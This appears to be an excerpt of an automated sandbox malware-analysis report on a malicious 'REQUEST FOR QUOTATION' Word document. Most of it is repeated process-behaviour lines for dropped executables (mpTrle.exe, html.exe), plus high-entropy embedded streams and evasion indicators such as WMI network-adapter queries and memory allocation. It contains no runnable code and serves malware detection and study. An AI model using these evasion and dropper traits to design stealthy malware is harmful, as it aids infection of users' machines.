                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeProcess information set: NOOPENFILEERRORBOX
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91669502048 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: REQUEST FOR QUOTATION.docx.docStream path 'CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512715/CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512716/CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512717/CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512718/CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512720/CONTENTS' entropy: 7.91598386737 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512721/CONTENTS' entropy: 7.91669502048 (max. 8.0)
                      Source: ~WRF{1CB57AA5-D007-49F8-8F70-7D791EC5AD43}.tmp.0.drStream path '_1776512722/CONTENTS' entropy: 7.91598386737 (max. 8.0)

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Roaming\html.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 630000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 7A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 6590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 8A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 9A40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 1D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\html.exeMemory allocated: 930000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 250000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 2150000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: A20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 5830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 6830000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 6970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 7970000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\mpTrle\mpTrle.exeMemory allocated: 360000 memory reserve | memory write watchJump to behavior
